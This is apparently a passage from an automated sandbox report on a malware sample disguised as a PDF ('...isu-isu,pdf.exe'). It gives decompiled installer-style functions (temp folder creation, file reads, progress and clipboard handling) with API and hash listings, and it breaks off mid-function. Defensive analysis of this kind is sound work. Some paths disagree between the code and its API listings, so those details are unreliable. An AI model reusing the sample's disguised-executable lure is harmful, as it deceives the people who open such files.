                                                                        				int _t14;
                                                                        				signed int _t21;
                                                                        				int _t24;
                                                                        				signed int _t27;
                                                                        				void* _t28;
                                                                        
                                                                        				_t27 = _a4;
                                                                        				while(_t27 >= 0) {
                                                                        					_t8 = _t27 * 0x1c +  *0x7a2fb0;
                                                                        					__eflags =  *_t8 - 1;
                                                                        					if( *_t8 == 1) {
                                                                        						break;
                                                                        					}
                                                                        					_push(_t8); // executed
                                                                        					_t10 = E00401439(); // executed
                                                                        					__eflags = _t10 - 0x7fffffff;
                                                                        					if(_t10 == 0x7fffffff) {
                                                                        						return 0x7fffffff;
                                                                        					}
                                                                        					__eflags = _t10;
                                                                        					if(__eflags < 0) {
                                                                        						_t10 = E00405936(0x7a4000 - (_t10 + 1 << 0xa), 0x7a4000);
                                                                        						__eflags = _t10;
                                                                        					}
                                                                        					if(__eflags != 0) {
                                                                        						_t12 = _t10 - 1;
                                                                        						_t21 = _t27;
                                                                        						_t27 = _t12;
                                                                        						_t13 = _t12 - _t21;
                                                                        						__eflags = _t13;
                                                                        					} else {
                                                                        						_t13 = 1;
                                                                        						_t27 = _t27 + 1;
                                                                        					}
                                                                        					__eflags =  *(_t28 + 0xc);
                                                                        					if( *(_t28 + 0xc) != 0) {
                                                                        						 *0x7a276c =  *0x7a276c + _t13;
                                                                        						_t14 =  *0x7a2754;
                                                                        						__eflags = _t14;
                                                                        						_t24 = (0 | _t14 == 0x00000000) + _t14;
                                                                        						__eflags = _t24;
                                                                        						SendMessageA( *(_t28 + 0x18), 0x402, MulDiv( *0x7a276c, 0x7530, _t24), 0);
                                                                        					}
                                                                        				}
                                                                        				return 0;
                                                                        			}

APIs
• MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E5
• SendMessageA.USER32(00000402,00000402,00000000), ref: 004013F5
Strings
Memory Dump Source
• Source File: 00000000.00000002.656376259.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.656371436.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.656383603.0000000000407000.00000002.00020000.sdmp
• Associated: 00000000.00000002.656389325.0000000000409000.00000004.00020000.sdmp
• Associated: 00000000.00000002.656419100.000000000077A000.00000004.00020000.sdmp
• Associated: 00000000.00000002.656424293.0000000000784000.00000004.00020000.sdmp
• Associated: 00000000.00000002.656429564.0000000000788000.00000004.00020000.sdmp
• Associated: 00000000.00000002.656484427.0000000000795000.00000004.00020000.sdmp
• Associated: 00000000.00000002.656489285.00000000007A1000.00000004.00020000.sdmp
• Associated: 00000000.00000002.656510078.00000000007A9000.00000004.00020000.sdmp
• Associated: 00000000.00000002.656514885.00000000007AC000.00000002.00020000.sdmp
Similarity
• API ID: MessageSend
• String ID: 4@
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 84%
E00403116(void* __eflags) {
    void* _t2;
    void* _t5;
    CHAR* _t6;

    // Hard-coded temp directory path recovered from the dump.
    _t6 = "C:\\Users\\jones\\AppData\\Local\\Temp\\";
    E00405BFB(_t6);
    _t2 = E00405538(_t6);
    if(_t2 != 0) {
        E004054CC(_t6);
        // Make sure the temp directory exists before it is used.
        CreateDirectoryA(_t6, 0); // executed
        // Called with the sample's own quoted path and the temp directory.
        _t5 = E004056BF("\"C:\\Users\\jones\\Desktop\\RFQ_AP65425652_032421 isu-isu,pdf.exe\" ", _t6); // executed
        return _t5;
    } else {
        return _t2;
    }
}

APIs
  • Part of subcall function 00405BFB: CharNextA.USER32(?,*?|<>/":,00000000,Error writing temporary file. Make sure your temp folder is valid.,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403122,C:\Users\user\AppData\Local\Temp\,00000000,004031B2), ref: 00405C53
  • Part of subcall function 00405BFB: CharNextA.USER32(?,?,?,00000000,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403122,C:\Users\user\AppData\Local\Temp\,00000000,004031B2), ref: 00405C60
  • Part of subcall function 00405BFB: CharNextA.USER32(?,Error writing temporary file. Make sure your temp folder is valid.,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403122,C:\Users\user\AppData\Local\Temp\,00000000,004031B2), ref: 00405C65
  • Part of subcall function 00405BFB: CharPrevA.USER32(?,?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403122,C:\Users\user\AppData\Local\Temp\,00000000,004031B2), ref: 00405C75
• CreateDirectoryA.KERNELBASE(C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031B2), ref: 00403137
Strings
Memory Dump Source
• Source File: 00000000.00000002.656376259.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: Char$Next$CreateDirectoryPrev
• String ID: "C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe" $C:\Users\user\AppData\Local\Temp\
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 51%
E00401B71(void* __ebx) {
    intOrPtr _t8;
    void* _t9;
    void _t12;
    void* _t14;
    void* _t22;
    void* _t25;
    void* _t28;
    void* _t30;
    void* _t32;
    void* _t33;
    void* _t34;
    void* _t37;
    void* _t3;
    void* _t5;

    _t28 = __ebx;
    _t8 =  *((intOrPtr*)(_t37 - 0x1c));
    // 0x40b018 holds the head of a singly linked list of heap blocks;
    // each block stores the next pointer in its first dword.
    _t30 =  *0x40b018; // 0x0
    if(_t8 == __ebx) {
        if( *((intOrPtr*)(_t37 - 0x20)) == __ebx) {
            // Allocate a zero-initialised block and push it onto the list head.
            _t9 = GlobalAlloc(0x40, 0x404); // executed
            _t34 = _t9;
            _t5 = _t34 + 4; // 0x4
            E004059E1(__ebx, _t30, _t34, _t5,  *((intOrPtr*)(_t37 - 0x24)));
            _t12 =  *0x40b018; // 0x0
             *_t34 = _t12;
             *0x40b018 = _t34;
        } else {
            if(_t30 == __ebx) {
                 *((intOrPtr*)(_t37 - 4)) = 1;
            } else {
                // Pop the head block: copy its payload out, unlink it, free it.
                _t3 = _t30 + 4; // 0x4
                E004059BF(_t33, _t3);
                _push(_t30);
                 *0x40b018 =  *_t30;
                GlobalFree();
            }
        }
        goto L15;
    } else {
        // Walk _t8 nodes down the list.
        while(1) {
            _t8 = _t8 - 1;
            if(_t30 == _t28) {
                break;
            }
            _t30 =  *_t30;
            if(_t8 != _t28) {
                continue;
            } else {
                if(_t30 == _t28) {
                    break;
                } else {
                    // Swap the payload of the selected node with the head node via 0x409c18.
                    _t32 = _t30 + 4;
                    E004059BF(0x409c18, _t30 + 4);
                    _t22 =  *0x40b018; // 0x0
                    E004059BF(_t32, _t22 + 4);
                    _t25 =  *0x40b018; // 0x0
                    _push(0x409c18);
                    _push(_t25 + 4);
                    E004059BF();
                    L15:
                     *0x7a3008 =  *0x7a3008 +  *((intOrPtr*)(_t37 - 4));
                    _t14 = 0;
                }
            }
            goto L17;
        }
        _push(0x200010);
        _push(E004059E1(_t28, _t30, _t33, _t28, 0xffffffe8));
        E004052BF();
        _t14 = 0x7fffffff;
    }
    L17:
    return _t14;
}

APIs
• GlobalFree.KERNEL32 ref: 00401BE1
• GlobalAlloc.KERNELBASE(00000040,00000404), ref: 00401BF3
Strings
Memory Dump Source
• Source File: 00000000.00000002.656376259.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: Global$AllocFree
• String ID: Ivlfdpdlcleoxmzl
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 68%
E00405690(CHAR* _a4, long _a8, long _a12) {
    signed int _t5;
    void* _t6;

    // Query the existing attributes so they can be passed back to CreateFileA.
    _t5 = GetFileAttributesA(_a4); // executed
    asm("sbb ecx, ecx");
    // _a8 = desired access, _a12 = creation disposition; share mode is FILE_SHARE_READ (1).
    _t6 = CreateFileA(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
    return _t6;
}

APIs
• GetFileAttributesA.KERNELBASE(00000003,00402C7D,C:\Users\user\Desktop,80000000,00000003,?,?,Error writing temporary file. Make sure your temp folder is valid.,004032AF,00000000,00000000,00000020), ref: 00405694
• CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,Error writing temporary file. Make sure your temp folder is valid.,004032AF,00000000,00000000,00000020), ref: 004056B6
Memory Dump Source
• Source File: 00000000.00000002.656376259.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: File$AttributesCreate
• String ID:
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
                                                                        			E004030CD(void* _a4, long _a8) {
                                                                        				int _t6;
                                                                        				long _t10;
                                                                        
                                                                        				_t10 = _a8;
                                                                        				_t6 = ReadFile( *0x409020, _a4, _t10,  &_a8, 0); // executed
                                                                        				if(_t6 == 0 || _a8 != _t10) {
                                                                        					return 0;
                                                                        				} else {
                                                                        					return 1;
                                                                        				}
                                                                        			}

                                                                        APIs
                                                                        • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,00402F0D,000000FF,00000004,00000000,00000000,00000000), ref: 004030E4
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.656376259.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.656371436.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656383603.0000000000407000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656389325.0000000000409000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656419100.000000000077A000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656424293.0000000000784000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656429564.0000000000788000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656484427.0000000000795000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656489285.00000000007A1000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656510078.00000000007A9000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656514885.00000000007AC000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: FileRead
                                                                        • String ID:
                                                                        • API String ID: 2738559852-0
                                                                        • Opcode ID: f91aafd9ec9002b658fe048398ef4ecca8a0f43a27f2371a89b598af4e44343e
                                                                        • Instruction ID: 4fd4a8308e5d5898c176f95433ccaa972cd52e025ae54bcd1c8d1e1e5a7d5bbe
                                                                        • Opcode Fuzzy Hash: f91aafd9ec9002b658fe048398ef4ecca8a0f43a27f2371a89b598af4e44343e
                                                                        • Instruction Fuzzy Hash: FEE08C32611219BFCF105E559C01EE73F6CEB043A2F00C032F919E5190D630EA14EBA8
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E004030FF(long _a4) {
                                                                        				long _t2;
                                                                        
                                                                        				_t2 = SetFilePointer( *0x409020, _a4, 0, 0); // executed
                                                                        				return _t2;
                                                                        			}

                                                                        APIs
                                                                        • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402E2A,?,?,?,Error writing temporary file. Make sure your temp folder is valid.,004032AF,00000000,00000000,00000020), ref: 0040310D
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.656376259.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.656371436.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656383603.0000000000407000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656389325.0000000000409000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656419100.000000000077A000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656424293.0000000000784000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656429564.0000000000788000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656484427.0000000000795000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656489285.00000000007A1000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656510078.00000000007A9000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656514885.00000000007AC000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: FilePointer
                                                                        • String ID:
                                                                        • API String ID: 973152223-0
                                                                        • Opcode ID: de52c7a2a910bc3da80fb7f00694c34356361307f5662ff296472372640bc7ed
                                                                        • Instruction ID: 25801f27feaadc63e0c23ae6d5f917682d27e8bc7d9ad1472eb802ffa7caf717
                                                                        • Opcode Fuzzy Hash: de52c7a2a910bc3da80fb7f00694c34356361307f5662ff296472372640bc7ed
                                                                        • Instruction Fuzzy Hash: E4B01232954300BFDA114B00DE05F057B72B758700F208030B340380F0C2712420DB0D
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Non-executed Functions

                                                                        C-Code - Quality: 89%
                                                                        			E00404EA0(long _a4, long _a8, long _a12, unsigned int _a16) {
                                                                        				struct HWND__* _v8;
                                                                        				struct tagRECT _v24;
                                                                        				void* _v32;
                                                                        				signed int _v36;
                                                                        				int _v40;
                                                                        				CHAR* _v44;
                                                                        				signed int _v48;
                                                                        				int _v52;
                                                                        				void* _v56;
                                                                        				void* _v64;
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				long _t86;
                                                                        				struct HMENU__* _t88;
                                                                        				unsigned int _t91;
                                                                        				int _t93;
                                                                        				int _t94;
                                                                        				void* _t100;
                                                                        				intOrPtr _t123;
                                                                        				struct HWND__* _t127;
                                                                        				int _t148;
                                                                        				int _t149;
                                                                        				struct HWND__* _t153;
                                                                        				struct HWND__* _t157;
                                                                        				struct HMENU__* _t159;
                                                                        				long _t161;
                                                                        				CHAR* _t162;
                                                                        				CHAR* _t163;
                                                                        
                                                                        				_t153 =  *0x7a2764;
                                                                        				_t148 = 0;
                                                                        				_v8 = _t153;
                                                                        				if(_a8 != 0x110) {
                                                                        					if(_a8 == 0x405) {
                                                                        						CloseHandle(CreateThread(0, 0, E00404E34, GetDlgItem(_a4, 0x3ec), 0,  &_a4));
                                                                        					}
                                                                        					if(_a8 != 0x111) {
                                                                        						L16:
                                                                        						if(_a8 != 0x404) {
                                                                        							L24:
                                                                        							if(_a8 != 0x7b || _a12 != _t153) {
                                                                        								goto L19;
                                                                        							} else {
                                                                        								_t86 = SendMessageA(_t153, 0x1004, _t148, _t148);
                                                                        								_a8 = _t86;
                                                                        								if(_t86 <= _t148) {
                                                                        									L36:
                                                                        									return 0;
                                                                        								}
                                                                        								_t88 = CreatePopupMenu();
                                                                        								_push(0xffffffe1);
                                                                        								_push(_t148);
                                                                        								_t159 = _t88;
                                                                        								AppendMenuA(_t159, _t148, 1, E004059E1(_t148, _t153, _t159));
                                                                        								_t91 = _a16;
                                                                        								if(_t91 != 0xffffffff) {
                                                                        									_t149 = _t91;
                                                                        									_t93 = _t91 >> 0x10;
                                                                        								} else {
                                                                        									GetWindowRect(_t153,  &_v24);
                                                                        									_t149 = _v24.left;
                                                                        									_t93 = _v24.top;
                                                                        								}
                                                                        								_t94 = TrackPopupMenu(_t159, 0x180, _t149, _t93, _t148, _t153, _t148);
                                                                        								_t161 = 1;
                                                                        								if(_t94 == 1) {
                                                                        									_v56 = _t148;
                                                                        									_v44 = 0x79f580;
                                                                        									_v40 = 0xfff;
                                                                        									_a4 = _a8;
                                                                        									do {
                                                                        										_a4 = _a4 - 1;
                                                                        										_t161 = _t161 + SendMessageA(_v8, 0x102d, _a4,  &_v64) + 2;
                                                                        									} while (_a4 != _t148);
                                                                        									OpenClipboard(_t148);
                                                                        									EmptyClipboard();
                                                                        									_t100 = GlobalAlloc(0x42, _t161);
                                                                        									_a4 = _t100;
                                                                        									_t162 = GlobalLock(_t100);
                                                                        									do {
                                                                        										_v44 = _t162;
                                                                        										SendMessageA(_v8, 0x102d, _t148,  &_v64);
                                                                        										_t163 =  &(_t162[lstrlenA(_t162)]);
                                                                        										 *_t163 = 0xa0d;
                                                                        										_t162 =  &(_t163[2]);
                                                                        										_t148 = _t148 + 1;
                                                                        									} while (_t148 < _a8);
                                                                        									GlobalUnlock(_a4);
                                                                        									SetClipboardData(1, _a4);
                                                                        									CloseClipboard();
                                                                        								}
                                                                        								goto L36;
                                                                        							}
                                                                        						}
                                                                        						if( *0x7a274c == _t148) {
                                                                        							ShowWindow( *0x7a2f84, 8);
                                                                        							if( *0x7a300c == _t148) {
                                                                        								E00404D62( *((intOrPtr*)( *0x79ed58 + 0x34)), _t148);
                                                                        							}
                                                                        							E00403D80(1);
                                                                        							goto L24;
                                                                        						}
                                                                        						 *0x79e950 = 2;
                                                                        						E00403D80(0x78);
                                                                        						goto L19;
                                                                        					} else {
                                                                        						if(_a12 != 0x403) {
                                                                        							L19:
                                                                        							return E00403E0E(_a8, _a12, _a16);
                                                                        						}
                                                                        						ShowWindow( *0x7a2750, _t148);
                                                                        						ShowWindow(_t153, 8);
                                                                        						E0040417A();
                                                                        						goto L16;
                                                                        					}
                                                                        				}
                                                                        				_v48 = _v48 | 0xffffffff;
                                                                        				_v36 = _v36 | 0xffffffff;
                                                                        				_v56 = 2;
                                                                        				_v52 = 0;
                                                                        				_v44 = 0;
                                                                        				_v40 = 0;
                                                                        				asm("stosd");
                                                                        				asm("stosd");
                                                                        				_t123 =  *0x7a2f88;
                                                                        				_a8 =  *((intOrPtr*)(_t123 + 0x5c));
                                                                        				_a12 =  *((intOrPtr*)(_t123 + 0x60));
                                                                        				 *0x7a2750 = GetDlgItem(_a4, 0x403);
                                                                        				 *0x7a2748 = GetDlgItem(_a4, 0x3ee);
                                                                        				_t127 = GetDlgItem(_a4, 0x3f8);
                                                                        				 *0x7a2764 = _t127;
                                                                        				_v8 = _t127;
                                                                        				E00403DDC( *0x7a2750);
                                                                        				 *0x7a2754 = E004045FA(4);
                                                                        				 *0x7a276c = 0;
                                                                        				GetClientRect(_v8,  &_v24);
                                                                        				_v48 = _v24.right - GetSystemMetrics(0x15);
                                                                        				SendMessageA(_v8, 0x101b, 0,  &_v56);
                                                                        				SendMessageA(_v8, 0x1036, 0x4000, 0x4000);
                                                                        				if(_a8 >= 0) {
                                                                        					SendMessageA(_v8, 0x1001, 0, _a8);
                                                                        					SendMessageA(_v8, 0x1026, 0, _a8);
                                                                        				}
                                                                        				if(_a12 >= _t148) {
                                                                        					SendMessageA(_v8, 0x1024, _t148, _a12);
                                                                        				}
                                                                        				_push( *((intOrPtr*)(_a16 + 0x30)));
                                                                        				_push(0x1b);
                                                                        				E00403DA7(_a4);
                                                                        				if(( *0x7a2f90 & 0x00000003) != 0) {
                                                                        					ShowWindow( *0x7a2750, _t148);
                                                                        					if(( *0x7a2f90 & 0x00000002) != 0) {
                                                                        						 *0x7a2750 = _t148;
                                                                        					} else {
                                                                        						ShowWindow(_v8, 8);
                                                                        					}
                                                                        				}
                                                                        				_t157 = GetDlgItem(_a4, 0x3ec);
                                                                        				SendMessageA(_t157, 0x401, _t148, 0x75300000);
                                                                        				if(( *0x7a2f90 & 0x00000004) != 0) {
                                                                        					SendMessageA(_t157, 0x409, _t148, _a12);
                                                                        					SendMessageA(_t157, 0x2001, _t148, _a8);
                                                                        				}
                                                                        				goto L36;
                                                                        			}
                                                                        0x00404f25
                                                                        0x00404f2a
                                                                        0x00404f2d
                                                                        0x00404f39
                                                                        0x00404f42
                                                                        0x00404f4b
                                                                        0x00404f6e
                                                                        0x00404f74
                                                                        0x00404f85
                                                                        0x00404f8a
                                                                        0x00404f98
                                                                        0x00404fa6
                                                                        0x00404fa6
                                                                        0x00404fab
                                                                        0x00404fb9
                                                                        0x00404fb9
                                                                        0x00404fbe
                                                                        0x00404fc1
                                                                        0x00404fc6
                                                                        0x00404fd2
                                                                        0x00404fdb
                                                                        0x00404fe8
                                                                        0x00404ff7
                                                                        0x00404fea
                                                                        0x00404fef
                                                                        0x00404fef
                                                                        0x00404fe8
                                                                        0x0040500c
                                                                        0x00405015
                                                                        0x0040501e
                                                                        0x0040502e
                                                                        0x0040503a
                                                                        0x0040503a
                                                                        0x00000000

                                                                        APIs
                                                                        • GetDlgItem.USER32 ref: 00404EFF
                                                                        • GetDlgItem.USER32 ref: 00404F0E
                                                                        • GetDlgItem.USER32 ref: 00404F1D
                                                                          • Part of subcall function 00403DDC: SendMessageA.USER32(00000028,?,00000001,00403C0F), ref: 00403DEA
                                                                        • GetClientRect.USER32 ref: 00404F4B
                                                                        • GetSystemMetrics.USER32 ref: 00404F53
                                                                        • SendMessageA.USER32(?,0000101B,00000000,00000002), ref: 00404F74
                                                                        • SendMessageA.USER32(?,00001036,00004000,00004000), ref: 00404F85
                                                                        • SendMessageA.USER32(?,00001001,00000000,00000110), ref: 00404F98
                                                                        • SendMessageA.USER32(?,00001026,00000000,00000110), ref: 00404FA6
                                                                        • SendMessageA.USER32(?,00001024,00000000,?), ref: 00404FB9
                                                                        • ShowWindow.USER32(00000000,?,0000001B,?), ref: 00404FDB
                                                                        • ShowWindow.USER32(?,00000008), ref: 00404FEF
                                                                        • GetDlgItem.USER32 ref: 00405005
                                                                        • SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 00405015
                                                                        • SendMessageA.USER32(00000000,00000409,00000000,?), ref: 0040502E
                                                                        • SendMessageA.USER32(00000000,00002001,00000000,00000110), ref: 0040503A
                                                                        • GetDlgItem.USER32 ref: 00405057
                                                                        • CreateThread.KERNEL32(00000000,00000000,Function_00004E34,00000000), ref: 00405065
                                                                        • CloseHandle.KERNEL32(00000000), ref: 0040506C
                                                                        • ShowWindow.USER32(00000000), ref: 00405090
                                                                        • ShowWindow.USER32(?,00000008), ref: 00405095
                                                                        • ShowWindow.USER32(00000008), ref: 004050DB
                                                                        • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040510D
                                                                        • CreatePopupMenu.USER32 ref: 0040511E
                                                                        • AppendMenuA.USER32 ref: 00405133
                                                                        • GetWindowRect.USER32 ref: 00405146
                                                                        • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405168
                                                                        • SendMessageA.USER32(?,0000102D,00000000,?), ref: 004051A3
                                                                        • OpenClipboard.USER32(00000000), ref: 004051B3
                                                                        • EmptyClipboard.USER32(?,?,00000000,?,00000000), ref: 004051B9
                                                                        • GlobalAlloc.KERNEL32(00000042,?,?,?,00000000,?,00000000), ref: 004051C2
                                                                        • GlobalLock.KERNEL32 ref: 004051CC
                                                                        • SendMessageA.USER32(?,0000102D,00000000,?), ref: 004051E0
                                                                        • lstrlenA.KERNEL32(00000000,?,?,00000000,?,00000000), ref: 004051E7
                                                                        • GlobalUnlock.KERNEL32(00000000,00000000,?,?,00000000,?,00000000), ref: 004051FE
                                                                        • SetClipboardData.USER32 ref: 00405209
                                                                        • CloseClipboard.USER32(?,?,00000000,?,00000000), ref: 0040520F
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.656376259.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.656371436.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656383603.0000000000407000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656389325.0000000000409000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656419100.000000000077A000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656424293.0000000000784000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656429564.0000000000788000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656484427.0000000000795000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656489285.00000000007A1000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656510078.00000000007A9000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656514885.00000000007AC000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlocklstrlen
                                                                        • String ID: {
                                                                        • API String ID: 1050754034-366298937
                                                                        • Opcode ID: 4723e716c10b73e0435ed70f776bd01053d2ffbf0d5e924f1bf3189799b0a89d
                                                                        • Instruction ID: 09b722d0185256cc624264d40bb0edb6627bdfa233c056c1d5ba82df3b217a72
                                                                        • Opcode Fuzzy Hash: 4723e716c10b73e0435ed70f776bd01053d2ffbf0d5e924f1bf3189799b0a89d
                                                                        • Instruction Fuzzy Hash: 0FA14B70900208FFDB11AF64DD89AAE7F79FB48354F10812AFA05BA1A1C7785E41DF69
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 93%
                                                                        			E004046A7(struct HWND__* _a4, int _a8, unsigned int _a12, int _a16) {
                                                                        				struct HWND__* _v8;
                                                                        				struct HWND__* _v12;
                                                                        				signed int _v16;
                                                                        				intOrPtr _v20;
                                                                        				struct HBITMAP__* _v24;
                                                                        				long _v28;
                                                                        				int _v32;
                                                                        				signed int _v40;
                                                                        				int _v44;
                                                                        				signed int* _v56;
                                                                        				intOrPtr _v60;
                                                                        				signed int _v64;
                                                                        				long _v68;
                                                                        				void* _v72;
                                                                        				intOrPtr _v76;
                                                                        				intOrPtr _v80;
                                                                        				void* _v84;
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				struct HWND__* _t182;
                                                                        				int _t196;
                                                                        				long _t202;
                                                                        				signed int _t206;
                                                                        				signed int _t217;
                                                                        				void* _t220;
                                                                        				void* _t221;
                                                                        				int _t227;
                                                                        				signed int _t232;
                                                                        				signed int _t233;
                                                                        				signed int _t240;
                                                                        				void* _t252;
                                                                        				intOrPtr _t258;
                                                                        				char* _t268;
                                                                        				signed char _t269;
                                                                        				long _t274;
                                                                        				int _t280;
                                                                        				signed int* _t281;
                                                                        				int _t282;
                                                                        				long _t283;
                                                                        				int _t285;
                                                                        				long _t286;
                                                                        				signed int _t287;
                                                                        				long _t288;
                                                                        				signed int _t291;
                                                                        				signed int _t298;
                                                                        				signed int _t300;
                                                                        				signed int _t302;
                                                                        				int* _t310;
                                                                        				void* _t311;
                                                                        				int _t315;
                                                                        				int _t316;
                                                                        				int _t317;
                                                                        				signed int _t318;
                                                                        				void* _t320;
                                                                        
                                                                        				_v12 = GetDlgItem(_a4, 0x3f9);
                                                                        				_t182 = GetDlgItem(_a4, 0x408);
                                                                        				_t280 =  *0x7a2fa8;
                                                                        				_t320 = SendMessageA;
                                                                        				_v8 = _t182;
                                                                        				_t315 = 0;
                                                                        				_v32 = _t280;
                                                                        				_v20 =  *0x7a2f88 + 0x94;
                                                                        				if(_a8 != 0x110) {
                                                                        					L23:
                                                                        					if(_a8 != 0x405) {
                                                                        						_t289 = _a16;
                                                                        					} else {
                                                                        						_a12 = _t315;
                                                                        						_t289 = 1;
                                                                        						_a8 = 0x40f;
                                                                        						_a16 = 1;
                                                                        					}
                                                                        					if(_a8 == 0x4e || _a8 == 0x413) {
                                                                        						_v16 = _t289;
                                                                        						if(_a8 == 0x413 ||  *((intOrPtr*)(_t289 + 4)) == 0x408) {
                                                                        							if(( *0x7a2f91 & 0x00000002) != 0) {
                                                                        								L41:
                                                                        								if(_v16 != _t315) {
                                                                        									_t232 = _v16;
                                                                        									if( *((intOrPtr*)(_t232 + 8)) == 0xfffffe6e) {
                                                                        										SendMessageA(_v8, 0x419, _t315,  *(_t232 + 0x5c));
                                                                        									}
                                                                        									_t233 = _v16;
                                                                        									if( *((intOrPtr*)(_t233 + 8)) == 0xfffffe6a) {
                                                                        										if( *((intOrPtr*)(_t233 + 0xc)) != 2) {
                                                                        											 *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) =  *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) & 0xffffffdf;
                                                                        										} else {
                                                                        											 *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) =  *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) | 0x00000020;
                                                                        										}
                                                                        									}
                                                                        								}
                                                                        								goto L48;
                                                                        							}
                                                                        							if(_a8 == 0x413) {
                                                                        								L33:
                                                                        								_t289 = 0 | _a8 != 0x00000413;
                                                                        								_t240 = E00404627(_v8, _a8 != 0x413);
                                                                        								if(_t240 >= _t315) {
                                                                        									_t93 = _t280 + 8; // 0x8
                                                                        									_t310 = _t240 * 0x418 + _t93;
                                                                        									_t289 =  *_t310;
                                                                        									if((_t289 & 0x00000010) == 0) {
                                                                        										if((_t289 & 0x00000040) == 0) {
                                                                        											_t298 = _t289 ^ 0x00000001;
                                                                        										} else {
                                                                        											_t300 = _t289 ^ 0x00000080;
                                                                        											if(_t300 >= 0) {
                                                                        												_t298 = _t300 & 0xfffffffe;
                                                                        											} else {
                                                                        												_t298 = _t300 | 0x00000001;
                                                                        											}
                                                                        										}
                                                                        										 *_t310 = _t298;
                                                                        										E0040117D(_t240);
                                                                        										_t289 = 1;
                                                                        										_a8 = 0x40f;
                                                                        										_a12 = 1;
                                                                        										_a16 =  !( *0x7a2f90) >> 0x00000008 & 1;
                                                                        									}
                                                                        								}
                                                                        								goto L41;
                                                                        							}
                                                                        							_t289 = _a16;
                                                                        							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
                                                                        								goto L41;
                                                                        							}
                                                                        							goto L33;
                                                                        						} else {
                                                                        							goto L48;
                                                                        						}
                                                                        					} else {
                                                                        						L48:
                                                                        						if(_a8 != 0x111) {
                                                                        							L56:
